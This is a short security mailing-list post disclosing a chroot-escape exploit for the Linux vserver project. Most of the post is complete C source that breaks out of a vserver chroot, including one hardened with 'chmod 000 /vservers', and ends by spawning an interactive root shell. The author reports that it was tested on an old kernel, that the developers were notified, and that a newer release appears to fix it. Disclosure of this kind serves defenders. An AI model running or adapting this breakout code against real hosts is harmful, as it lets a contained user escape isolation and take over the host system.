vserver_chroot.txt

`Hi securityfocus,  
  
a small exploit from me which brakes out of a vserver, also if secured   
with "chmod 000 /vservers". It is a modification of the known   
"chroot-again" exploit. It belongs to chroots but also to the vserver   
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted   
to the developers, and in the today released version 1.25 it seems to be   
fixed.  
  
/* [email protected] modified the chroot-again exploit */  
/* to work on vservers with "chmod 000 /vservers" */  
  
/* Run this code in a vserver as root */  
/* Tested with 2.4.24 and vserver 1.24 */  
  
#include <sys/types.h>  
#include <sys/stat.h>  
  
main()  
{  
int i;  
  
if (chdir("/") != 0) {  
perror("cd /"); exit(1);  
}  
if (mkdir("baz", 0777) != 0) {  
perror("mkdir baz");  
}  
if (chroot("baz") != 0) {  
perror("chroot baz"); exit(1);  
}  
  
for (i=0; i<50; i++) {  
if (chdir("..") != 0) {  
perror("cd .."); /* exit(1); */  
}  
if (chmod("..", S_IXOTH) != 0) {  
perror("chmod"); /* exit(1); */  
}  
}  
if (chroot(".") != 0) {  
perror("chroot ."); exit(1);  
}  
printf("Exploit seems to work. =)\n");  
execl("/bin/sh", "sh", "-i", (char *)0);  
perror("exec sh");  
exit(0);  
}  
  
The developers have been noticed.  
  
Greetings,  
Markus Müller  
GeNUA mbH  
`